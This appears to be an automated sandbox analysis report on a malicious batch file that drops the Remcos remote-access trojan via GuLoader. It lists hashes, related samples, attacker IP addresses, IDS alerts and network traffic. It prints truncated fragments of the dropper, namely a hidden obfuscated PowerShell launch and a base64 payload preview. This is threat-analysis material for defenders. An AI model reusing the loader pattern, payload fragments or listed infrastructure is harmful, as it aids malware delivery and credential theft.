                                                                                                                                                  db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                  • 91.139.6.161
                                                                                                                                                  na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 89.40.18.190
                                                                                                                                                  na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 178.183.111.121
                                                                                                                                                  na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 94.42.225.25
                                                                                                                                                  SMX-ACH0036173.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                  • 81.181.254.190
                                                                                                                                                  Pedido urgente N#U00ba FVPCI24 _ 4690 CLIENTE_ JUSTO LOPEZ VALCARCEL, S.A.wsfGet hashmaliciousGuLoaderBrowse
                                                                                                                                                  • 81.181.254.190
                                                                                                                                                  Dringende Bestellung 10142024 HLS Eurocustoms24 Zollservice GmbH & Co.KG.wsfGet hashmaliciousGuLoaderBrowse
                                                                                                                                                  • 81.181.254.190
                                                                                                                                                  na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                  • 62.29.162.205
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0ePO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  https://iplogger.ru/250925Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.2892.1397.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.5562.5412.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  Bestireno Transformados SL PEDIDO 268884.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  Bestireno Transformados SL PEDIDO 268884.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  Transferencias6231.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  uYP4XsZFKS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19ecforyoutomakemegood.htaGet hashmaliciousCobalt Strike, AgentTesla, GuLoaderBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  Bestellung.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  Bestellung_101624.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  Bestireno Transformados SL PEDIDO 268884.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  company T.P. Drinovci d.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  6rxVO117yJ.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  DHL_Shipping_Invoices_Awb_BL_000000000101620242247820020031808174Global180030010162024.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                  • 89.44.138.129
                                                                                                                                                  No context
                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):144
                                                                                                                                                  Entropy (8bit):3.379519383183141
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:rhlKlM+UlSltUlyLFi5JWRal2Jl+7R0DAlBG45klovDl6v:6lyIlmlJ5YcIeeDAlOWAv
                                                                                                                                                  MD5:81F18E0AB70665412E4036FC2599C766
                                                                                                                                                  SHA1:DFEB2748C61EF6F0228C55528CA70997BFB724E2
                                                                                                                                                  SHA-256:4AAF2BCDC2DA5EA745AC082D4537437E2A5F193451CA6BA132205192492FF2FA
                                                                                                                                                  SHA-512:D816DB3C9E0AEEE6C18CCA9BEBB372E73AB7B48A129B879DB57D80CFB8F1336507CD44526FD97439DE4750B6D23BE2D7BDCF409FFF2872EA4CB9B2BC8240C236
                                                                                                                                                  Malicious:true
                                                                                                                                                  Yara Hits:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                  Preview:....[.2.0.2.4./.1.0./.1.7. .0.8.:.1.9.:.0.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                  File Type:JSON data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):957
                                                                                                                                                  Entropy (8bit):5.006273389567236
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qXdbauKyGX85jHf3SvXhNlT3/7YvfbYro:600GX85mvhjTkvfEro
                                                                                                                                                  MD5:7BF15E327A8ED82DDDD8335441F5D4B2
                                                                                                                                                  SHA1:9B72F36526922E596FCCFA037270A4463CA312CB
                                                                                                                                                  SHA-256:3AA1572C5D0770A9771544DEF2E2FA4AED5BBBE7F9349C6A16D8051B460369E3
                                                                                                                                                  SHA-512:105D6ACE2E23A7376EE48840F2448A8BE0A2CCDA0B72D4DDEA9E20A19DC89E7A54A584AC0814BC7FBDD0E351B63055F4EEEF77F01F8E54943982FF6BB5386D1C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{. "geoplugin_request":"173.254.250.82",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):8003
                                                                                                                                                  Entropy (8bit):4.840877972214509
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                                                                  MD5:106D01F562D751E62B702803895E93E0
                                                                                                                                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                                                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                                                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):64
                                                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                                                                                                                                  MD5:DA1F22117B9766A1F0220503765A5BA5
                                                                                                                                                  SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                                                                                                                                  SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                                                                                                                                  SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:@...e.................................R..............@..........
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2cb0b895, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20447232
                                                                                                                                                  Entropy (8bit):1.2844992188061906
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:UUsY++g7gKwOfvUDn2Z+oi5cT1FfHlI5IFj:Y+lPDq+m
                                                                                                                                                  MD5:944908073C94C4C4B21100BA56AC8056
                                                                                                                                                  SHA1:E013E3EC59CA764F0C01AF2944E2CECD5555AC5E
                                                                                                                                                  SHA-256:0EF30AAA3DF1054B55573ABF99ABC4A80B675146D0DEBC02B189420784309118
                                                                                                                                                  SHA-512:488374F4E050FA4949E4E2D14C39232F07186F072073EDEEAB508D20C702D0435412B7A2EA3A0E8584FB9F1DBFA806B4BC3129CFFC51DD02E9848D44CA64BDB9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:,...... ........=......J}...0...{......................!."..... ....{]......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;.................................A........{..........................{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2
                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6221
                                                                                                                                                  Entropy (8bit):3.735181232299983
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:LPMns65hLPr3C4U28ejjukvhkvklCywrmdJFbPRlRASogZoSpFbPRl4ASogZo21:7Mzh33CxHeOkvhkvCCtaNPRpH5NPReHB
                                                                                                                                                  MD5:E3A9708F1479F372443A76307CA3E575
                                                                                                                                                  SHA1:11DD9DE4B8DF9201EDFF6257AF88F3F784E7A90E
                                                                                                                                                  SHA-256:89D6D59EFA346491CECEB0C0AF223CF46545797F5FDD200FB305206745F620FC
                                                                                                                                                  SHA-512:7BD0C03EE12C3EDFF4896E006D8A1291B768CAA9D4487E168C3A76A14FC2B167EC6BB4C81BD7BF78236ED701364ABCD973309D2E7548777969003B68CFC078C3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...................................FL..................F.".. ...-/.v....... ..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....dIS.. ..+.... ......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^QYCb...........................%..A.p.p.D.a.t.a...B.V.1.....QYAb..Roaming.@......CW.^QYAb..........................$f..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^QYEb..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWU`..Windows.@......CW.^DWU`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^QYEb....Q...........
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6221
                                                                                                                                                  Entropy (8bit):3.735181232299983
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:LPMns65hLPr3C4U28ejjukvhkvklCywrmdJFbPRlRASogZoSpFbPRl4ASogZo21:7Mzh33CxHeOkvhkvCCtaNPRpH5NPReHB
                                                                                                                                                  MD5:E3A9708F1479F372443A76307CA3E575
                                                                                                                                                  SHA1:11DD9DE4B8DF9201EDFF6257AF88F3F784E7A90E
                                                                                                                                                  SHA-256:89D6D59EFA346491CECEB0C0AF223CF46545797F5FDD200FB305206745F620FC
                                                                                                                                                  SHA-512:7BD0C03EE12C3EDFF4896E006D8A1291B768CAA9D4487E168C3A76A14FC2B167EC6BB4C81BD7BF78236ED701364ABCD973309D2E7548777969003B68CFC078C3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...................................FL..................F.".. ...-/.v....... ..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....dIS.. ..+.... ......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^QYCb...........................%..A.p.p.D.a.t.a...B.V.1.....QYAb..Roaming.@......CW.^QYAb..........................$f..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^QYEb..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWU`..Windows.@......CW.^DWU`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^QYEb....Q...........
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):459916
                                                                                                                                                  Entropy (8bit):5.852017989109397
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:UOyu1FFv3c3q8mZUPlRMJhLJzhg0yConZCDm:U43c3zCfzCrzn9
                                                                                                                                                  MD5:8E17FCF873193AC8AD9CE6F1FAA25721
                                                                                                                                                  SHA1:7D8B4026BF51FC7C818D3731A3FADC6DCE8D248A
                                                                                                                                                  SHA-256:EE2D23E0E9534C70CB366945F0FCAF6D6AE92B8332765B99058B383A36D074D0
                                                                                                                                                  SHA-512:812660206EBE17189E09DE465258BB3AFB3236C6FB1C4C297FB7980870392C11233568CFAA22408B94D5C82FCD92FC3B5F03E36A69A1E9BA0A2646213DF222A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:cQGb6wIkDrt01RQA6wJRNXEBmwNcJATrArwicQGbuQyxCU/rAvAKcQGbgfFTaQDscQGb6wJsloHpX9gJo+sC5U5xAZvrAveQ6wIAo7pAWELocQGbcQGb6wKDa+sCK6YxyusCVM1xAZuJFAtxAZtxAZvR4nEBm+sCfbqDwQRxAZtxAZuB+UydcwJ8zOsCmohxAZuLRCQE6wLKGusCMJKJw+sCo3ZxAZuBw9E8VwBxAZvrAj4Suh5uZz9xAZtxAZuBwrxMVavrAoEV6wJGPIHy2rq86usCfw3rAi4wcQGb6wLvAXEBm+sC94WLDBBxAZtxAZuJDBNxAZvrAiLoQnEBm+sCBFqB+hjOBAB11nEBm+sCa5eJXCQMcQGb6wImuoHtAAMAAOsCcY/rAoD7i1QkCOsCnlFxAZuLfCQEcQGbcQGbietxAZvrAkjsgcOcAAAA6wK54nEBm1PrAhbP6wJTYWpA6wLwMOsCVU6J63EBm3EBm8eDAAEAAACAiwLrAl796wIbjoHDAAEAAOsClVNxAZtT6wLbjnEBm4nrcQGbcQGbibsEAQAAcQGb6wJPfYHDBAEAAHEBm+sCEbJT6wI4DnEBm2r/6wL1OHEBm4PCBesCDAxxAZsx9usCx9lxAZsxyesCwanrAmIMixpxAZtxAZtB6wKu4esCdP05HAp18usCwjzrAg96RnEBm3EBm4B8Cvu4ddxxAZtxAZuLRAr86wKUOnEBmynw6wKE6+sCRTH/0nEBm3EBm7oYzgQAcQGb6wIU7DHAcQGb6wIGrYt8JAzrAp9scQGbgTQHmqLLKnEBm3EBm4PABOsClZHrAhKfOdB15OsCjOtxAZuJ+3EBm+sCF+H/13EBm+sCnEJyossqmvlCzxtOjq2Iokru3ybZKs8rLpNwcysVG1MMyZIaStuh+OlsG1PFQlBjra9BZY8nmqUEG+ObA6vur8tq77EwTG1g9scb1sYqVn2O0xvWxioRx6xRG2OVoLekSsPA
                                                                                                                                                  File type:ASCII text, with very long lines (5877), with no line terminators
                                                                                                                                                  Entropy (8bit):5.3617250781208305
                                                                                                                                                  TrID:
                                                                                                                                                    File name:SKU_0001710-1-2024-SX-3762.bat
                                                                                                                                                    File size:5'877 bytes
                                                                                                                                                    MD5:fb6e5f4c35e2410abe92acca08412d29
                                                                                                                                                    SHA1:3e70e5fa943bf9ba4e2cadd21fc3b03a3ac899b8
                                                                                                                                                    SHA256:4f1b5d4bb6d0a7227948fb7ebb7765f3eb4b26288b52356453b74ea530111520
                                                                                                                                                    SHA512:3b7557f2429f2b420b59486a1bf40bf628d813257f0f4ac18d3141f3c0dc2661c71a18d16bffd24bb821993dbe8d58921befc72a6352282664526578d981068b
                                                                                                                                                    SSDEEP:96:huxRrcsSLAGiMygfOYiAx2MSauo6SrBJb4yr5BgDk:2rFSs3Hg5iAx2MSauoNVJ0yFBD
                                                                                                                                                    TLSH:39C13910E3549F61D6B2C843A8DAC1271A14D276CB2344B9BD8A82F7DF04D2D72BC7CA
                                                                                                                                                    File Content Preview:start /min powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI
                                                                                                                                                    Icon Hash:9686878b929a9886
                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                    2024-10-17T14:18:29.043578+02002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449732TCP
                                                                                                                                                    2024-10-17T14:18:57.807542+02002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.462775TCP
                                                                                                                                                    2024-10-17T14:19:06.734289+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.462802193.187.91.21653848TCP
                                                                                                                                                    2024-10-17T14:19:08.588027+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.462818178.237.33.5080TCP
                                                                                                                                                    2024-10-17T14:19:08.953036+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.462817193.187.91.21653848TCP
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Oct 17, 2024 14:18:15.966727018 CEST4973080192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:15.979660034 CEST804973089.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:15.979738951 CEST4973080192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:15.979938984 CEST4973080192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:15.984796047 CEST804973089.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:16.873316050 CEST804973089.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:16.874459028 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:16.874517918 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:16.874629974 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:16.883994102 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:16.884011984 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:16.921519995 CEST4973080192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:17.807750940 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:17.807820082 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:17.811408997 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:17.811423063 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:17.811723948 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:17.822721958 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:17.867400885 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.095458031 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.140301943 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.243180990 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.243196011 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.243227005 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.243241072 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.243257046 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.243305922 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.243328094 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.243360996 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.243396997 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.363128901 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.363188028 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.363233089 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.363233089 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.363250971 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.363290071 CEST49731443192.168.2.489.44.138.129
